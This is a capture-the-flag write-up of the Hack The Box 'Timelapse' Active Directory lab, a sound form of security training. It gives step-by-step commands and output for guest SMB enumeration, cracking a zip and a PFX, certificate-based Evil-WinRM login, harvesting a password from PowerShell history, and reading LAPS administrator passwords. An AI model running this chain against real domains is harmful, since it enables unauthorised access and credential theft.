HTB Timelapse

medium.com · Dipesh Paul · 4 days ago · research
quality 7/10 · good
0 net
Tags
bug-bounty
HTB Timelapse | by Dipesh Paul - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original HTB Timelapse Platform: Hack The Box Difficulty: Easy OS: Windows Topics: SMB Enumeration, Password Cracking (John the Ripper), PFX Certificate… Dipesh Paul Follow ~12 min read · April 5, 2026 (Updated: April 5, 2026) · Free: Yes Platform: Hack The Box Difficulty: Easy OS: Windows Topics: SMB Enumeration, Password Cracking (John the Ripper), PFX Certificate Extraction, WinRM over SSL, PowerShell History Forensics, BloodHound/SharpHound, LAPS Abuse Overview Timelapse is a Windows Active Directory machine that chains together a realistic set of techniques you'd encounter during a real-world AD engagement. The attack path moves from anonymous SMB access → password-protected archive cracking → PFX certificate extraction for SSL-based WinRM authentication → credential recovery from a forgotten PowerShell history file → privilege escalation via LAPS read abuse. Every step in this box maps to a documented technique in the Active Directory attack playbook, making it a solid reference for C-ADPenX preparation and for demonstrating practical AD pentesting knowledge in interviews. Recon - Nmap Started with a full port scan across all 65535 ports to get a complete picture of what's exposed, using --min-rate to keep it fast: nmap -p- --min-rate 10000 10.129.227.113 -T4 This returned a list of open ports. From there, I ran a targeted service and script scan against only those ports for accurate version detection without wasting time on the closed ones: nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389 -sCV --min-rate 10000 10.129.227.113 -T4 Full output: Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-04 08:22 +0530 Nmap scan report for 10.129.227.113 Host is up (0.44s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-04 10:56:29Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb, Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 5986/tcp open ssl/wsmans? | tls-alpn: | h2 |_ http/1.1 |_ssl-date: 2026-04-04T10:59:11+00:00; +8h03m37s from scanner time. | ssl-cert: Subject: commonName=dc01.timelapse.htb | Not valid before: 2021-10-25T14:05:29 |_Not valid after: 2022-10-25T14:25:29 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required |_clock-skew: mean: 8h03m36s, deviation: 0s, median: 8h03m36s | smb2-time: | date: 2026-04-04T10:58:35 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 192.78 seconds Analysis: The open ports tell a clear story before any exploitation begins: Port 53 - DNS is running, expected on a DC. Useful for zone transfer attempts later if needed. Port 88 - Kerberos. Confirms this is a Domain Controller. Also opens the door for AS-REP Roasting or Kerberoasting if we get valid usernames. Port 135/139 - MSRPC and NetBIOS. Standard Windows services. Port 389/3268 - LDAP and Global Catalog. Enumerable with valid credentials. Port 445 - SMB. First thing to probe without credentials. Port 464 - kpasswd5 , the Kerberos password change service. Normal on DCs. Port 593 - RPC over HTTP. Sometimes exploitable in older configurations. Port 636/3269 - LDAP and Global Catalog over SSL. Port 5986 - WinRM over SSL. Standard WinRM runs on port 5985 over plain HTTP; 5986 uses HTTPS/SSL. The fact that 5985 doesn't appear in our scan at all means unencrypted WinRM is completely disabled - every remote management connection on this machine must go through SSL. The certificate nmap pulled gives us the exact hostname ( commonName=dc01.timelapse.htb ) and shows the cert is expired, but that only means our tools need to skip certificate validation. In Evil-WinRM this is handled with the -S flag, which we'll be using on every WinRM connection throughout this box regardless of which user we're authenticating as. Port 9389 - .NET Message Framing , used by Active Directory Web Services (ADWS). This is the endpoint PowerShell's AD module communicates with. SMB signing enabled and required - rules out SMB relay attacks (NTLM relay to SMB). Not a blocker here, just worth noting. Clock skew of ~8 hours - significant for Kerberos, which has a default 5-minute tolerance. Kerberos-based attacks would need clock synchronization ( sudo ntpdate timelapse.htb or faketime ). In this case we won't need it since we end up using password-based WinRM, not ticket-based Kerberos. First thing after the scan: add both timelapse.htb and dc01.timelapse.htb to /etc/hosts . Foothold - SMB Enumeration No credentials yet, so the first question is whether anonymous/null or guest authentication is permitted. Use netexec to probe this and enumerate shares in one shot: netexec smb 10.129.227.113 -u guest -p '' --shares Full output: SMB 10.129.227.113 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:None) (Null Auth:True) SMB 10.129.227.113 445 DC01 [+] timelapse.htb\guest: SMB 10.129.227.113 445 DC01 [*] Enumerated shares SMB 10.129.227.113 445 DC01 Share Permissions Remark SMB 10.129.227.113 445 DC01 ----- ----------- ------ SMB 10.129.227.113 445 DC01 ADMIN$ Remote Admin SMB 10.129.227.113 445 DC01 C$ Default share SMB 10.129.227.113 445 DC01 IPC$ READ Remote IPC SMB 10.129.227.113 445 DC01 NETLOGON Logon server share SMB 10.129.227.113 445 DC01 Shares READ SMB 10.129.227.113 445 DC01 SYSVOL Logon server share Null Auth: True confirms guest/anonymous access is enabled. The share named Shares stands out, it has no remark (unlike the standard shares), it's readable as a guest, and it's clearly non-standard. ADMIN$, C$, NETLOGON, and SYSVOL are all default shares that would normally require elevated permissions to read. Connect and pull down all the contents: smbclient //10.129.227.113/Shares -U 'guest' -p '' smb: \> ls . D 0 Mon Oct 25 20:09:14 2021 .. D 0 Mon Oct 25 20:09:14 2021 Dev D 0 Mon Oct 25 23:10:09 2021 HelpDesk D 0 Mon Oct 25 20:48:42 2021 Two subdirectories. Check both: smb: \Dev\> ls . D 0 Mon Oct 25 23:10:09 2021 .. D 0 Mon Oct 25 23:10:09 2021 winrm_backup.zip A 2611 KB Mon Oct 25 19:46:42 2021 smb: \HelpDesk\> ls . D 0 Mon Oct 25 20:48:42 2021 .. D 0 Mon Oct 25 20:48:42 2021 LAPS_Datasheet.docx A 104422 Mon Oct 25 20:48:42 2021 LAPS_OperationsGuide.docx A 641378 Mon Oct 25 20:48:42 2021 LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 20:48:42 2021 LAPS.x64.msi A 1118208 Mon Oct 25 20:48:42 2021 Downloaded everything locally: ┌──(thegenetic㉿kali)-[~/Desktop/timelapse] └─$ ls LAPS_Datasheet.docx LAPS_OperationsGuide.docx LAPS_TechnicalSpecification.docx LAPS.x64.msi winrm_backup.zip Reading the environment from the files: The HelpDesk folder is essentially advertising that LAPS (Local Administrator Password Solution) is deployed in this domain. The presence of official Microsoft LAPS documentation and the installer MSI strongly suggests the tool is actively in use. LAPS automatically rotates local Administrator passwords on domain-joined machines and stores them as an attribute on the computer object in Active Directory. Only specific AD groups are granted read access to that attribute - a fact we'll come back to during privilege escalation. The winrm_backup.zip in the Dev folder is the immediate priority. It's password protected. Stage 1 - Cracking the Zip Archive Convert the zip to a hash format that John the Ripper understands, then crack it: zip2john winrm_backup.zip > zip_hash.txt Created directory: /home/thegenetic/.john ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8 The zip2john output already tells us what's inside - legacyy_dev_auth.pfx . That's a PFX file (Personal Information Exchange), which is a PKCS#12 container holding an X.509 certificate and its associated private key. The name includes legacyy - likely a username - and dev_auth , suggesting it was created for authentication in a development context. john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx) 1g 0:00:00:00 DONE (2026-04-04 10:16) 3.846g/s 13359Kp/s 13359Kc/s 13359KC/s suzyqzb..superkebab Use the "--show" option to display all of the cracked passwords reliably Session completed. Zip password: supremelegacy Extract to get legacyy_dev_auth.pfx . Stage 2 - Cracking the PFX File The PFX file itself is also password protected. Same approach with pfx2john : pfx2john legacyy_dev_auth.pfx > pfx_hash.txt # then use a wordlist to bruteforce the password john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x]) Cost 1 (iteration count) is 2000 for all loaded hashes Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status thuglegacy (legacyy_dev_auth.pfx) 1g 0:00:00:38 DONE (2026-04-04 20:35) 0.02570g/s 83056p/s 83056c/s 83056C/s thumper1990..thsco04 Use the "--show" option to display all of the cracked passwords reliably Session completed. PFX password: thuglegacy Note that both passwords are different - the zip and PFX were independently protected, which is a detail that matters in practice. Always try to crack each layer separately rather than assuming one password covers all. To inspect the contents of the PFX: openssl pkcs12 -in legacyy_dev_auth.pfx -info Providing the import password thuglegacy : MAC: sha1, Iteration 2000 MAC length: 20, salt length: 20 PKCS7 Data Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2000 Bag Attributes Microsoft Local Key set: localKeyID: 01 00 00 00 friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b Microsoft CSP Name: Microsoft Software Key Storage Provider Key Attributes X509v3 Key Usage: 90 -----BEGIN ENCRYPTED PRIVATE KEY----- MIIFNTBfBgkqhkiG9w0BBQ0wUjAxBgkqhkiG9w0BBQwwJAQQAcvU0OkxHy3orCrs ... -----END ENCRYPTED PRIVATE KEY----- Certificate bag Bag Attributes localKeyID: 01 00 00 00 subject=CN=Legacyy issuer=CN=Legacyy -----BEGIN CERTIFICATE----- MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1 MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0 0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z 7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72 MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0 3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/ fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA -----END CERTIFICATE----- The certificate's subject=CN=Legacyy and the SAN: [email protected] confirm this was issued to the domain user legacyy . It was likely used for client certificate authentication over WinRM - which fits perfectly given port 5986 (WinRM over SSL) is open. Certificate and Key Extraction To use this certificate with Evil-WinRM, the cert and key need to be extracted as separate unencrypted PEM files. Doing it in one shot with the private key still encrypted will cause Evil-WinRM to fail, so decrypt it as part of the process: Extract the certificate only: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt # Enter Import Password: thuglegacy cat cert.crt Bag Attributes localKeyID: 01 00 00 00 subject=CN=Legacyy issuer=CN=Legacyy -----BEGIN CERTIFICATE----- MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1 MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC ... -----END CERTIFICATE----- Extract the private key (initially encrypted with a PEM passphrase): openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out encrypted_key.pem # Enter Import Password: thuglegacy # Set a PEM pass phrase: thuglegacy # Verify: thuglegacy Decrypt the private key to remove the PEM passphrase: openssl rsa -in encrypted_key.pem -out private_key.pem # Enter pass phrase for encrypted_key.pem: (the one you just set) # writing RSA key cat private_key.pem -----BEGIN PRIVATE KEY----- MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3 dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2 qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW ... -----END PRIVATE KEY----- Both files ready: cert.crt and private_key.pem . Initial Shell - WinRM over SSL (Certificate Authentication) Evil-WinRM supports certificate-based auth via -c (certificate) and -k (private key). The -S flag enables SSL, required since the target is on port 5986 and not the standard 5985: evil-winrm -c cert.crt -k private_key.pem -i 10.129.227.113 -S Evil-WinRM shell v3.9 Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\legacyy\Documents> whoami timelapse\legacyy Shell as timelapse\legacyy . User flag is on the desktop. Post-Exploitation Enumeration - PowerShell History Before running SharpHound, manual enumeration comes first. One of the most overlooked artifacts on Windows machines is the PSReadLine command history file. Unlike bash's .bash_history , this file doesn't get cleared often and persists across all PowerShell sessions for a given user. It's essentially a free log of everything the user has ever typed at a PS prompt: *Evil-WinRM* PS C:\Users\legacyy> cd $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ *Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> ls Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt *Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> download ConsoleHost_history.txt Info: Downloading C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt to ConsoleHost_history.txt Info: Download successful! Reading the file on Kali: cat ConsoleHost_history.txt whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit The history shows someone was using Invoke-Command to run commands as svc_deploy over a local SSL WinRM connection - likely testing connectivity or automation. They wrote the plaintext password directly into the command, which PSReadLine silently logged. Credentials recovered: User: svc_deploy Password: E3R$Q62^12p7PLlC%KWaxuaV AD Enumeration - BloodHound + SharpHound Run SharpHound to collect AD data from the compromised legacyy session: *Evil-WinRM* PS C:\Users\legacyy\Documents> .\SharpHound.exe -c All --outputdirectory . Download the zip: *Evil-WinRM* PS C:\Users\legacyy\Documents> download 20260404174014_BloodHound.zip Info: Downloading C:\Users\legacyy\Documents\20260404174014_BloodHound.zip to 20260404174014_BloodHound.zip Info: Download successful! Loading the data into BloodHound reveals the key finding: svc_deploy is a member of LAPS_Readers , and LAPS_Readers has ReadLAPSPassword permissions on the DC01 computer object. This can also be confirmed without BloodHound using native commands. Logging into svc_deploy's session and running net user : *Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy User name svc_deploy Full Name svc_deploy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/25/2021 12:12:37 PM Password expires Never Password changeable 10/26/2021 12:12:37 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 10/25/2021 12:25:53 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *LAPS_Readers *Domain Users The command completed successfully. LAPS_Readers membership confirmed. Remote Management Users membership means WinRM access is also available, no need for an alternate lateral movement path. Privilege Escalation - Lateral Movement to svc_deploy Log in directly via Evil-WinRM: evil-winrm -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -i timelapse.htb -S Evil-WinRM shell v3.9 Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami timelapse\svc_deploy Privilege Escalation - LAPS Password Extraction LAPS stores the managed local Administrator password in the ms-mcs-admpwd attribute on the computer object in AD. The expiration time is in ms-mcs-admpwdexpirationtime . Any user in a group with ReadLAPSPassword permission can query these attributes directly. Method 1 - From the svc_deploy WinRM session using Get-ADComputer: *Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb DNSHostName : dc01.timelapse.htb Enabled : True ms-mcs-admpwd : D9H[}E&8Ds7Ty1vteK@49,KQ ms-mcs-admpwdexpirationtime : 134203126194037556 Name : DC01 ObjectClass : computer ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f SamAccountName : DC01$ SID : S-1-5-21-671920749-559770252-3318990721-1000 UserPrincipalName : Method 2 - Directly from Kali using bloodyAD (no shell needed): bloodyAD --host 10.129.227.113 -d timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd distinguishedName: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb ms-Mcs-AdmPwd: D9H[}E&8Ds7Ty1vteK@49,KQ Local Administrator password for DC01: D9H[}E&8Ds7Ty1vteK@49,KQ Administrator Shell evil-winrm -i dc01.timelapse.htb -u Administrator -p 'D9H[}E&8Ds7Ty1vteK@49,KQ' -S Evil-WinRM shell v3.9 Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami timelapse\administrator Browse the users directory - the root flag isn't in Administrator's desktop on this box: *Evil-WinRM* PS C:\Users> ls Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/23/2021 11:27 AM Administrator d----- 10/25/2021 8:22 AM legacyy d-r--- 10/23/2021 11:27 AM Public d----- 10/25/2021 12:23 PM svc_deploy d----- 2/23/2022 5:45 PM TRX *Evil-WinRM* PS C:\Users\TRX> type Desktop/root.txt Rooted. Key Takeaways PSReadLine history is consistently overlooked. The path %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt should be in your standard post-exploitation checklist for every Windows engagement. This is different from the old doskey history - PSReadLine persists across sessions and is rarely cleared. When someone runs a PSCredential command with a hardcoded password, it gets logged here verbatim. PFX files are two-layer targets. The zip had one password, the PFX had another. In real engagements, PFX files found in backups, shares, or repositories are almost always worth attempting to crack - they often contain client authentication certificates that grant direct access without needing to know a user's password. Certificate-based WinRM is a legitimate access vector. This isn't just a CTF technique. Client certificate authentication over WinRM is used in real enterprise environments, particularly for service accounts and automation. If you find a PFX file associated with a domain account and WinRM over SSL is available, that's a direct access path. LAPS is only as secure as its ACL. The tool itself does what it's supposed to - rotate passwords automatically. The weakness is when ReadLAPSPassword is granted to groups with too many members, or when membership of those groups isn't reviewed regularly. From an attacker's perspective, finding LAPS_Readers (or equivalent) membership on a compromised account is a reliable and low-noise path to local Administrator on managed machines. No exploitation, no payloads - just an LDAP query. Always browse C:\Users\ after getting Administrator access. On shared lab environments (and sometimes in real engagements with multiple admin users), sensitive files can be in user directories other than Administrator's own desktop. This habit also reveals which accounts exist on the box independently of what AD says. Dipesh Paul is a security analyst at Deloitte, based in Agartala, India. He runs the BugHunt Blueprint YouTube channel, which focuses on practical cybersecurity education through hands‑on labs and real vulnerability walkthroughs. Connect: LinkedIn: Dipesh Paul YouTube: @bughuntblueprint X (Twitter): DipeshPaul19 Support the channel: Buy Me a Coffee This writeup is part of my C-ADPen-X prep series. All testing was done on Hack The Box's official lab environment. #hackthebox #ethical-hacking #penetration-testing #hacking #bug-bounty Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
← Back to stories